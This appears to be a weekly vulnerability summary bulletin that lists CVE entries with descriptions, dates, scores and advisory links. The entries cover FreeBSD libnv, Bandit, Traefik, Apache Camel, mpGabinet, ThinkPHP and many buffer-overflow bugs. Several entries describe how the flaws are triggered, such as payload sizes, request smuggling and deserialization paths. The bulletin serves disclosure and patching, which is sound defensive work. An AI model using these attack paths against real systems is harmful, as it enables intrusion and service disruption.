| FreeBSD--FreeBSD | When exchanging data over a socket, libnv uses select(2) to wait for data to arrive. However, it does not verify whether the provided socket descriptor fits in select(2)'s file descriptor set size limit of FD_SETSIZE (1024). An attacker who is able to force a libnv application to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, can trigger stack corruption. If the target application is setuid-root, then this could be used to elevate local privileges. | 2026-04-30 | not yet calculated | CVE-2026-39457 | https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc |
| mtrudel--bandit | Allocation of Resources Without Limits or Throttling vulnerability in mtrudel bandit allows unauthenticated remote denial of service via memory exhaustion when WebSocket permessage-deflate compression is enabled. 'Elixir.Bandit.WebSocket.PerMessageDeflate':inflate/2 in lib/bandit/websocket/permessage_deflate.ex calls :zlib.inflate/2 with no output-size cap, then materializes the entire decompressed payload as a single binary via IO.iodata_to_binary/1. The websocket_options.max_frame_size option only bounds the on-the-wire (compressed) frame size, not the decompressed output. A high-ratio compressed frame (e.g. uniform data at ~1024:1 ratio) can stay well under any wire-size limit while forcing GiB-scale heap allocations in the connection process before any application code runs. An unauthenticated attacker who can open a WebSocket connection can send a single such frame to exhaust the BEAM node's memory and trigger an OOM kill. This vulnerability requires both Bandit's server-level websocket_options.compress and the per-upgrade compress: true option passed to WebSockAdapter.upgrade/4 to be enabled. Stock Phoenix and LiveView applications are not affected as they default to compress: false. This issue affects bandit: from 0.5.9 before 1.11.0. | 2026-05-01 | not yet calculated | CVE-2026-39804 | https://github.com/mtrudel/bandit/security/advisories/GHSA-frh3-6pv6-rc8j https://cna.erlef.org/cves/CVE-2026-39804.html https://osv.dev/vulnerability/EEF-CVE-2026-39804 https://github.com/mtrudel/bandit/commit/8156921a51e684a951221da7bc30a70a022f722e |
| mtrudel--bandit | Inconsistent Interpretation of HTTP Requests vulnerability in mtrudel bandit allows HTTP request smuggling via duplicate Content-Length headers. 'Elixir.Bandit.Headers':get_content_length/1 in lib/bandit/headers.ex uses List.keyfind/3, which returns only the first matching header. When a request contains two Content-Length headers with different values, Bandit silently accepts it, uses the first value to read the body, and dispatches the remaining bytes as a second pipelined request on the same keep-alive connection. RFC 9112 §6.3 requires recipients to treat this as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length value and forwards the request rather than rejecting it, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects bandit: before 1.11.0. | 2026-05-01 | not yet calculated | CVE-2026-39805 | https://github.com/mtrudel/bandit/security/advisories/GHSA-c67r-gc9j-2qf7 https://cna.erlef.org/cves/CVE-2026-39805.html https://osv.dev/vulnerability/EEF-CVE-2026-39805 https://github.com/mtrudel/bandit/commit/f2ca636eb6df385219957e8934e9fc6efa1630d1 |
| mtrudel--bandit | Reliance on Untrusted Inputs in a Security Decision vulnerability in mtrudel bandit allows unauthenticated transport-state spoofing on plaintext HTTP connections. 'Elixir.Bandit.Pipeline':determine_scheme/2 in lib/bandit/pipeline.ex returns the client-supplied URI scheme verbatim, ignoring the transport's secure? flag. HTTP/1.1 absolute-form request targets (e.g. GET https://victim/path HTTP/1.1) and the HTTP/2 :scheme pseudo-header are both attacker-controlled strings that flow through this function. Over a plaintext TCP connection, a client can declare https and Bandit will set conn.scheme = :https even though no TLS was negotiated. Downstream Plug consumers that branch on conn.scheme are silently misled: Plug.SSL's already-secure branch skips its HTTP→HTTPS redirect, cookies emitted with secure: true are sent over plaintext, audit logs record requests as having arrived over HTTPS, and CSRF/SameSite gating may make incorrect decisions. This issue affects bandit: from 1.0.0 before 1.11.0. | 2026-05-01 | not yet calculated | CVE-2026-39807 | https://github.com/mtrudel/bandit/security/advisories/GHSA-375f-4r2h-f99j https://cna.erlef.org/cves/CVE-2026-39807.html https://osv.dev/vulnerability/EEF-CVE-2026-39807 https://github.com/mtrudel/bandit/commit/45feea20dea8af7ffd7245271107b695c040e667 |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Prior to versions 2.11.43, 3.6.14, and 3.7.0-rc.2, there is a high severity authentication bypass vulnerability in Traefik's ForwardAuth and snippet-based authentication middleware. Traefik's forwarded-header sanitization logic targets only canonical header names (e.g., X-Forwarded-Proto) and does not strip or normalize alias variants that use underscores instead of dashes (e.g., X_Forwarded_Proto). These unsanitized alias headers are forwarded intact to the authentication backend. When the backend normalizes underscore and dash header forms equivalently, an attacker can inject spoofed trust context - such as a trusted scheme or host - through the alias headers and bypass authentication on protected routes without valid credentials. This issue has been patched in versions 2.11.43, 3.6.14, and 3.7.0-rc.2. | 2026-04-30 | not yet calculated | CVE-2026-39858 | https://github.com/traefik/traefik/security/advisories/GHSA-5m6w-wvh7-57vm https://github.com/traefik/traefik/releases/tag/v2.11.43 https://github.com/traefik/traefik/releases/tag/v3.6.14 https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2 |
| Apache Software Foundation--Apache Camel Platform HTTP Main | When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the BasicAuthenticationConfigurer and JWTAuthenticationConfigurer classes derive the authentication path from properties.getPath() when camel.server.authenticationPath / camel.management.authenticationPath is not explicitly set. Combined with the Vert.x sub-router mounting model - the sub-router is mounted at _path_* and the authentication handler is registered inside the sub-router at the resolved path - this causes the authentication handler to match only the exact configured context path, not its subpaths. Unauthenticated requests to subpaths such as /api/_route_ or /admin/observe/info therefore reach protected business routes and management endpoints without being challenged for credentials. The /observe/info endpoint can disclose runtime metadata such as the user, working directory, home directory, process ID, JVM and operating system information. This issue affects Apache Camel: from 4.14.1 before 4.14.6, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, they are suggested to upgrade to 4.14.6. If users are on the 4.18.x LTS releases stream, they are suggested to upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40022 | https://camel.apache.org/security/CVE-2026-40022.html |
| Apache Software Foundation--Apache Camel PQC | The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run before the type check. An attacker who can write to the key directory used by a Camel application - for example through a path traversal into the directory, misconfigured filesystem permissions on the volume where keys are stored, a compromised key provisioning pipeline, or a symlink attack - can place a crafted serialized Java object that, when deserialized during normal key lifecycle operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.19.0 before 4.20.0, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue by replacing java.io.ObjectInputStream-based key and metadata storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding. For users on the 4.18.x LTS releases stream, upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40048 | https://camel.apache.org/security/CVE-2026-40048.html |
| helpyio--helpy | Helpy contains a stored cross-site scripting vulnerability in the post author display logic. Any registered user can persist arbitrary HTML in their account name field and cause it to be rendered unescaped in public forum threads where they participate, in the admin ticket view, and in HTML notification emails sent to other users.This issue affects helpy: 2.8.0. | 2026-04-29 | not yet calculated | CVE-2026-40229 | https://fluidattacks.com/es/advisories/offspring https://github.com/helpyio/helpy |
| helpyio--helpy | Helpy contains a stored cross-site scripting vulnerability in the knowledge base Doc rendering logic. An authenticated attacker with admin or agent editor privileges can persist arbitrary HTML or JavaScript in the body field of a knowledge base Doc.This issue affects helpy: 2.8.0. | 2026-04-29 | not yet calculated | CVE-2026-40230 | https://fluidattacks.com/es/advisories/prisioneros https://github.com/helpyio/helpy |
| Apache Software Foundation--Apache Camel JMS | The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40453 | https://camel.apache.org/security/CVE-2026-40453.html |
| Apache Software Foundation--Apache Camel Mina | The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted serialized Java object over the network to the MINA consumer port can trigger arbitrary code execution in the context of the application during readObject(). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40473 | https://camel.apache.org/security/CVE-2026-40473.html |
| BinSoft--mpGabinet | mpGabinet is vulnerable to Privilege Escalation due to excessive database privileges assigned to the user used by the application. An attacker with access to any running application instance connected to the backend server can extract database credentials from the application's memory by inspecting the running process. While ability to retrieve credentials from memory is expected behavior, the exposed credentials grant administrative access to the database, exceeding the privileges required for normal application functionality. This allows an attacker to perform actions beyond those permitted through the application interface. This issue affects mpGabinet version 23.12.19 and below. | 2026-04-28 | not yet calculated | CVE-2026-40550 | https://cert.pl/posts/2026/04/CVE-2026-40550/ https://www.mpgabinet.pl/ |
| BinSoft--mpGabinet | mpGabinet performs client-side authentication. An attacker with access to any application instance connected to the backend server can bypass the login verification process by manipulating the application binary and authenticate as an arbitrary user. This issue affects mpGabinet version 23.12.19 and below. | 2026-04-28 | not yet calculated | CVE-2026-40551 | https://cert.pl/posts/2026/04/CVE-2026-40550/ https://www.mpgabinet.pl/ |
| BinSoft--mpGabinet | mpGabinet is vulnerable to Remote Command Execution. An authorized user with access to the application and direct access to the backend database can achieve system command execution by uploading an attachment and modifying its storage path in the database to reference an attacker-controlled remote network resource. Alternatively, it is possible to use a previously uploaded file and change its reference. When the application processes the attachment, and a user tries to open it, the referenced resource is executed by the system. Critically, this vulnerability can be exploited by any unauthenticated attacker by chaining it with CVE-2026-40550 and CVE-2026-40551, which allows obtaining database access, and logging onto any account. This issue affects mpGabinet version 23.12.19 and below. | 2026-04-28 | not yet calculated | CVE-2026-40552 | https://cert.pl/posts/2026/04/CVE-2026-40550/ https://www.mpgabinet.pl/ |
| Apache Software Foundation--Apache Storm Prometheus Reporter | Improper Certificate Validation via Global SSL Context Downgrade in Apache Storm Prometheus Reporter Versions Affected: from 2.6.3 to 2.8.6 Description: In production deployments where an administrator enables storm.daemon.metrics.reporter.plugin.prometheus.skip_tls_validation (by default it is disabled) intending to affect only the Prometheus reporter, the undocumented global side effect creates an attack surface across every TLS-protected communication channel in the Storm daemon. The PrometheusPreparableReporter class implements an INSECURE_TRUST_MANAGER that accepts all SSL certificates without validation, with empty checkClientTrusted and checkServerTrusted methods. Most critically, when the storm.daemon.metrics.reporter.plugin.prometheus.skip_tls_validation configuration option is enabled (default = disabled) for HTTPS Prometheus PushGateway connections, the INSECURE_CONNECTION_FACTORY calls SSLContext.setDefault(sslContext), which globally replaces the JVM's default SSL context rather than applying the insecure context only to the Prometheus connection. This payload flows through storm.yaml configuration → PrometheusPreparableReporter.prepare() → INSECURE_CONNECTION_FACTORY → SSLContext.setDefault(), resulting in a JVM-wide TLS security downgrade. All subsequent HTTPS connections in the process - including ZooKeeper, Thrift, Netty, and UI connections - silently trust all certificates, including self-signed, expired, and attacker-generated ones, enabling man-in-the-middle interception of cluster state, topology submissions, tuple data, and administrative credentials. Mitigation: 2.x users should upgrade to 2.8.7 if the Prometheus Metrics Reporter is used. Prometheus Metrics Reporter Users who cannot upgrade immediately should remove the storm.daemon.metrics.reporter.plugin.prometheus.skip_tls_validation: true setting from their storm.yaml configuration and instead configure a proper truststore containing the PushGateway's certificate. | 2026-04-27 | not yet calculated | CVE-2026-40557 | https://lists.apache.org/thread/f5bv68z1y5xstz22psjk05p3wn86knjq |
| MIYAGAWA--Starman | Starman versions before 0.4018 for Perl allows HTTP Request Smuggling via Improper Header Precedence. Starman incorrectly prioritizes "Content-Length" over "Transfer-Encoding: chunked" when both headers are present in an HTTP request. Per RFC 7230 3.3.3, Transfer-Encoding must take precedence. An attacker could exploit this to smuggle malicious HTTP requests via a front-end reverse proxy. | 2026-04-28 | not yet calculated | CVE-2026-40560 | https://github.com/miyagawa/Starman/commit/ced205f0805027e9d9c0731f8c40b104220604ed.patch https://metacpan.org/release/MIYAGAWA/Starman-0.4018/changes https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3 |
| KAZUHO--Starlet | Starlet versions through 0.31 for Perl allows HTTP Request Smuggling via Improper Header Precedence. Starlet incorrectly prioritizes "Content-Length" over "Transfer-Encoding: chunked" when both headers are present in an HTTP request. Per RFC 7230 3.3.3, Transfer-Encoding must take precedence. An attacker could exploit this to smuggle malicious HTTP requests via a front-end reverse proxy. | 2026-05-03 | not yet calculated | CVE-2026-40561 | https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3 https://github.com/kazuho/Starlet/commit/a7d5dfd1862aafa43e5eaca0fdb6acf4cc15b2d0.patch |
Vulnerability Summary for the Week of April 20, 2026
Posted on Tuesday April 28, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Thinkphp--ThinkPHP | ThinkPHP 5.0.23 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by invoking functions through the routing parameter. Attackers can craft requests to the index.php endpoint with malicious function parameters to execute system commands with application privileges. | 2026-04-22 | 9.8 | CVE-2018-25270 | ExploitDB-45978 Official Product Homepage Product Reference VulnCheck Advisory: ThinkPHP 5.0.23 Remote Code Execution via invokefunction |
| Elba--ELBA5 | ELBA5 5.8.0 contains a remote code execution vulnerability that allows attackers to obtain database credentials and execute arbitrary commands with SYSTEM level permissions. Attackers can connect to the database using default connector credentials, decrypt the DBA password, and execute commands via the xp_cmdshell stored procedure or add backdoor users to the BEDIENER table. | 2026-04-22 | 9.8 | CVE-2018-25272 | ExploitDB-45905 Official Product Homepage VulnCheck Advisory: ELBA5 5.8.0 Remote Code Execution via Database Access |
| Lizardsystems--Terminal Services Manager | Terminal Services Manager 3.1 contains a stack-based buffer overflow vulnerability in the computer names field that allows local attackers to execute arbitrary code by triggering structured exception handling. Attackers can craft a malicious input file with shellcode and jump instructions that overwrite the SEH handler pointer to execute calc.exe or other payloads when imported through the add computers wizard. | 2026-04-22 | 8.4 | CVE-2018-25259 | ExploitDB-46058 Official Product Homepage VulnCheck Advisory: Terminal Services Manager 3.1 Buffer Overflow SEH |
| Magix--MAGIX Music Editor | MAGIX Music Editor 3.1 contains a buffer overflow vulnerability in the FreeDB Proxy Options dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious payload, paste it into the Server field via the CD menu's FreeDB Proxy Options, and trigger code execution when settings are accepted. | 2026-04-22 | 8.4 | CVE-2018-25260 | ExploitDB-46056 Official Product Homepage Product Reference VulnCheck Advisory: MAGIX Music Editor 3.1 Buffer Overflow via SEH |
| Iperiusbackup--Iperius Backup | Iperius Backup 5.8.1 contains a local buffer overflow vulnerability in the structured exception handling (SEH) mechanism that allows local attackers to execute arbitrary code by supplying a malicious file path. Attackers can create a backup job with a crafted payload in the external file location field that triggers a buffer overflow when the backup job executes, enabling code execution with application privileges. | 2026-04-22 | 8.4 | CVE-2018-25261 | ExploitDB-46059 Official Product Homepage VulnCheck Advisory: Iperius Backup 5.8.1 Local Buffer Overflow SEH |
| faleemi--Faleemi Desktop Software | Faleemi Desktop Software 1.8.2 contains a local buffer overflow vulnerability in the Device alias field that allows local attackers to trigger a structured exception handler (SEH) overwrite. Attackers can craft a malicious payload and paste it into the Device alias field within the Managing Log interface to execute arbitrary code with calculator proof-of-concept execution. | 2026-04-26 | 8.4 | CVE-2018-25263 | ExploitDB-45492 Product Reference VulnCheck Advisory: Faleemi Desktop Software 1.8.2 Local Buffer Overflow SEH |
| Lizardsystems--LanSpy | LanSpy 2.0.1.159 contains a local buffer overflow vulnerability in the scan section that allows local attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious payloads using egghunter techniques to locate and execute shellcode, triggering code execution through SEH chain manipulation and controlled jumps. | 2026-04-22 | 8.4 | CVE-2018-25265 | ExploitDB-46018 Official Product Homepage VulnCheck Advisory: LanSpy 2.0.1.159 Local Buffer Overflow |
| Lizardsystems--LanSpy | LanSpy 2.0.1.159 contains a local buffer overflow vulnerability that allows attackers to overwrite the instruction pointer by supplying oversized input to the scan field. Attackers can craft a payload with 688 bytes of padding followed by 4 bytes of controlled data to crash the application or potentially achieve code execution. | 2026-04-22 | 8.4 | CVE-2018-25268 | ExploitDB-45968 Official Product Homepage VulnCheck Advisory: LanSpy 2.0.1.159 Local Buffer Overflow via Scan Field |
| Securimport--iSmartViewPro | iSmartViewPro 1.5 contains a structured exception handling (SEH) buffer overflow vulnerability in the 'Save Path for Snapshot and Record file' field that allows local attackers to execute arbitrary code. Attackers can input a crafted payload exceeding 260 bytes through the System Setup interface to overwrite SEH records and execute shellcode with application privileges. | 2026-04-26 | 8.4 | CVE-2018-25283 | ExploitDB-45349 Product Reference VulnCheck Advisory: iSmartViewPro 1.5 Buffer Overflow via SavePath Parameter |
| Cewe-Photoworld--CEWE Photoshow | CEWE Photoshow 6.3.4 contains a buffer overflow vulnerability in the login dialog that allows attackers to crash the application by submitting oversized input. Attackers can inject 4000 bytes of data into the email address and password fields to trigger a denial of service condition. | 2026-04-26 | 7.5 | CVE-2018-25294 | ExploitDB-45211 Official Product Homepage Product Reference VulnCheck Advisory: CEWE Photoshow 6.3.4 Buffer Overflow Denial of Service |
| Fortra--GoAnywhere MFT | The login limit is not enforced on the SFTP service of Fortra's GoAnywhere MFT prior to 7.10.0 if the Web User attempting to be logged in to is configured to log in with an SSH Key, making the SSH key vulnerable to being guessed via Brute Force. | 2026-04-21 | 7.3 | CVE-2025-14362 | https://fortra.com/security/advisories/product-security/FI-2026-002 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Angryip--Angry IP Scanner for Linux | Angry IP Scanner for Linux 3.5.3 contains a denial of service vulnerability that allows local attackers to crash the application by supplying malformed input to the port selection field. Attackers can craft a malicious string containing buffer overflow patterns and paste it into the Preferences Ports tab to trigger an application crash. | 2026-04-22 | 6.2 | CVE-2018-25262 | ExploitDB-46038 Official Product Homepage VulnCheck Advisory: Angry IP Scanner for Linux 3.5.3 Denial of Service |
| Acutesystems--TransMac | TransMac 12.2 contains a buffer overflow vulnerability in the license key input field that allows local attackers to crash the application by submitting an oversized string. Attackers can generate a payload file containing 4000 bytes of data, paste it into the License Key field, and trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25264 | ExploitDB-45493 VulnCheck Advisory: TransMac 12.2 Denial of Service via License Key Field |
| Angryip--Angry IP Scanner | Angry IP Scanner 3.5.3 contains a buffer overflow vulnerability in the preferences dialog that allows local attackers to crash the application by supplying an excessively large string. Attackers can generate a file containing a massive buffer of repeated characters and paste it into the unavailable value field in the display preferences to trigger a denial of service. | 2026-04-22 | 6.2 | CVE-2018-25266 | ExploitDB-45993 Official Product Homepage VulnCheck Advisory: Angry IP Scanner 3.5.3 Denial of Service via Preferences Buffer Overflow |
| Ultraiso--UltraISO | UltraISO 9.7.1.3519 contains a local buffer overflow vulnerability in the Output FileName field of the Make CD/DVD Image dialog that allows attackers to overwrite SEH and SE handler records. Attackers can craft a malicious filename string with 304 bytes of data followed by SEH record overwrite values and paste it into the Output FileName field to trigger a denial of service crash. | 2026-04-22 | 6.2 | CVE-2018-25267 | ExploitDB-45996 Official Product Homepage VulnCheck Advisory: UltraISO 9.7.1.3519 Buffer Overflow via Output FileName |
| icewarp--ICEWARP Client | ICEWARP 11.0.0.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious HTML elements into emails by embedding base64-encoded payloads in object and embed tags. Attackers can craft emails containing data URIs with embedded scripts that execute in the client when the email is viewed, compromising user sessions and stealing sensitive information. | 2026-04-22 | 6.1 | CVE-2018-25269 | ExploitDB-45974 Official Product Homepage VulnCheck Advisory: ICEWARP 11.0.0.0 Cross-Site Scripting via Email HTML Injection |
| Textpad--Textpad | Textpad 8.1.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long buffer string through the Run command interface. Attackers can paste a 5000-byte payload into the Command field via Tools > Run to trigger a buffer overflow that crashes the application. | 2026-04-22 | 6.2 | CVE-2018-25271 | ExploitDB-45956 Official Product Homepage Product Reference VulnCheck Advisory: Textpad 8.1.2 Denial of Service via Run Command |
| Acutesystems--CrossFont | CrossFont 7.5 contains a buffer overflow vulnerability that allows local attackers to crash the application by submitting an oversized payload in the License Key field. Attackers can generate a malicious file containing 4000 bytes of data, paste it into the License Key input field, and trigger an application crash when processing the input. | 2026-04-26 | 6.2 | CVE-2018-25273 | ExploitDB-45494 VulnCheck Advisory: CrossFont 7.5 Denial of Service via License Key Field |
| infrarecorder--InfraRecorder | InfraRecorder 0.53 contains a denial of service vulnerability that allows local attackers to crash the application by importing a maliciously crafted text file. Attackers can create a text file containing 6000 bytes of data and import it through the Edit menu's Import function to trigger an application crash. | 2026-04-26 | 6.2 | CVE-2018-25274 | ExploitDB-45413 VulnCheck Advisory: InfraRecorder 0.53 Denial of Service via txt File Import |
| faleemi--Faleemi Plus | Faleemi Plus 1.0.2 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying oversized input strings. Attackers can paste a 2000-byte payload into the Camera name and DID number fields during camera addition to trigger an application crash. | 2026-04-26 | 6.2 | CVE-2018-25275 | ExploitDB-45414 Product Reference VulnCheck Advisory: Faleemi Plus 1.0.2 Denial of Service via Buffer Overflow |
| Br-Software--PixGPS | PixGPS 1.1.8 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string to the folder path input field. Attackers can craft a payload exceeding 6000 bytes and paste it into the 'Folder with picture files' field to trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25277 | ExploitDB-45381 Product Reference VulnCheck Advisory: PixGPS 1.1.8 Buffer Overflow Denial of Service |
| Picajet--PicaJet FX | PicaJet FX 2.6.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to registration fields. Attackers can paste a 6000-byte buffer into the Registration Name and Registration Key fields via the Help menu's Register PicaJet dialog to trigger an application crash. | 2026-04-26 | 6.2 | CVE-2018-25278 | ExploitDB-45383 VulnCheck Advisory: PicaJet FX 2.6.5 Denial of Service via Registration Fields |
| Convertimagetotext--jiNa OCR Image to Text | jiNa OCR Image to Text 1.0 contains a denial of service vulnerability that allows local attackers to crash the application by processing a malformed PNG file. Attackers can create a specially crafted PNG file with an oversized buffer and trigger the crash when the application attempts to convert the file to PDF. | 2026-04-26 | 6.2 | CVE-2018-25279 | ExploitDB-45380 Product Reference VulnCheck Advisory: jiNa OCR Image to Text 1.0 Denial of Service via PNG |
| ZenMap--ZenMap | Nmap 7.70 contains a denial of service vulnerability that allows local attackers to crash the application by processing malicious XML files with exponential entity expansion. Attackers can create a crafted XML file with nested entity definitions and open it through ZenMap's scan import functionality to cause the program to consume excessive system resources and crash. | 2026-04-26 | 6.2 | CVE-2018-25282 | ExploitDB-45357 Product Reference VulnCheck Advisory: Nmap 7.70 Denial of Service via XML Entity Expansion |
| Hdtune--HD Tune Pro | HD Tune Pro 5.70 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the folder/file name field. Attackers can trigger a denial of service by entering a 6000-byte payload through the File > Options > Save dialog's folder/file name input field. | 2026-04-26 | 6.2 | CVE-2018-25284 | ExploitDB-45298 Official Product Homepage Product Reference VulnCheck Advisory: HD Tune Pro 5.70 Denial of Service via Options Dialog |
| Hdtune--Easy PhotoResQ | Easy PhotoResQ 1.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Folder/filename field. Attackers can input a 6000-byte payload through the File Options dialog to trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25286 | ExploitDB-45300 Official Product Homepage VulnCheck Advisory: Easy PhotoResQ 1.0 Buffer Overflow Denial of Service |
| Editorsoftware--StyleWriter | StyleWriter 1.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string. Attackers can paste a 6000-byte payload into the Pattern to Find or Advice Message fields in the Add Pattern dialog to trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25288 | ExploitDB-45250 Official Product Homepage Product Reference VulnCheck Advisory: StyleWriter 1.0 Denial of Service via Pattern Input |
| Ezbsystems--Softdisk | Softdisk 3.0.3 contains a buffer overflow vulnerability in the registration code dialog that allows local attackers to crash the application by supplying an oversized string. Attackers can trigger the vulnerability by entering a 6000-byte payload in the Registration Name field through the Help menu's Enter Registration Code dialog to cause a denial of service. | 2026-04-26 | 6.2 | CVE-2018-25289 | ExploitDB-45245 Official Product Homepage Product Reference VulnCheck Advisory: Softdisk 3.0.3 Buffer Overflow Denial of Service |
| Ezbsystems--Easyboot | Easyboot 6.6.0 contains a buffer overflow vulnerability in the Replace Text function that allows local attackers to crash the application by supplying an oversized string. Attackers can trigger the vulnerability by accessing File > Tools > Replace Text and pasting a 7000-byte payload into the text fields to cause a denial of service. | 2026-04-26 | 6.2 | CVE-2018-25290 | ExploitDB-45241 Official Product Homepage VulnCheck Advisory: Easyboot 6.6.0 Buffer Overflow Denial of Service |
| Pj64-Emu--Project64 | Project64 2.3.2 contains a buffer overflow vulnerability in the Plugin Directory settings field that allows local attackers to crash the application by supplying an excessively long string. Attackers can input a 6000-byte payload into the Plugin Directory field through the Options > Settings > Directories interface to trigger an application crash when settings are reopened. | 2026-04-26 | 6.2 | CVE-2018-25291 | ExploitDB-45229 Official Product Homepage VulnCheck Advisory: Project64 2.3.2 Denial of Service via Plugin Directory |
| Bome--Restorator | Bome Restorator 1793 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can create a malicious payload exceeding 4000 bytes and paste it into the Name input field to trigger an application crash and denial of service. | 2026-04-26 | 6.2 | CVE-2018-25292 | ExploitDB-45223 Official Product Homepage Product Reference VulnCheck Advisory: Bome Restorator 1793 Denial of Service via Buffer Overflow |
| Mersenne--Prime95 | Prime95 29.4b7 contains a buffer overflow vulnerability in the PrimeNet connection dialog that allows local attackers to crash the application by supplying an excessively long string in the optional proxy password field. Attackers can trigger a denial of service by entering a 6000-byte payload into the proxy password parameter, causing the application to crash when processing the connection settings. | 2026-04-26 | 6.2 | CVE-2018-25293 | ExploitDB-45226 Official Product Homepage Product Reference VulnCheck Advisory: Prime95 29.4b7 Denial of Service via Proxy Password Field |
| P10--ObserverIP Scan Tool | ObserverIP Scan Tool 1.4.0.1 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the IP input field. Attackers can paste a 2000-byte buffer of repeated characters into the IP field and trigger a search operation to cause an application crash. | 2026-04-26 | 6.2 | CVE-2018-25295 | ExploitDB-45204 Official Product Homepage Product Reference VulnCheck Advisory: ObserverIP Scan Tool 1.4.0.1 Denial of Service via IP Field |
| Wansview--Wansview | Wansview 1.0.2 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying oversized input strings. Attackers can inject 2000-byte payloads into the Camera name and DID number fields during camera addition to trigger application crashes. | 2026-04-26 | 6.2 | CVE-2018-25297 | ExploitDB-45194 VulnCheck Advisory: Wansview 1.0.2 Denial of Service via Buffer Overflow |
| 94Cb--Carbon Forum | Carbon Forum 5.9.0 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious JavaScript code through the Forum Name field in dashboard settings. Attackers with admin privileges can store JavaScript payloads in the Forum Name field that execute in the browsers of all users visiting the forum, enabling session hijacking and data theft. | 2026-04-22 | 6.4 | CVE-2024-58344 | ExploitDB-52043 Official Product Homepage Product Reference VulnCheck Advisory: Carbon Forum 5.9.0 Persistent XSS via Forum Name Field |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.9.6, 18.10 before 18.10.4, and 18.11 before 18.11.1 that could have allowed an authenticated user to cause denial of service under certain conditions by exhausting server resources by making crafted requests to a discussions endpoint. | 2026-04-22 | 6.5 | CVE-2025-0186 | HackerOne Bug Bounty Report #2915694 https://gitlab.com/gitlab-org/gitlab/-/work_items/511312 https://about.gitlab.com/releases/2026/04/22/patch-release-gitlab-18-11-1-released/ |
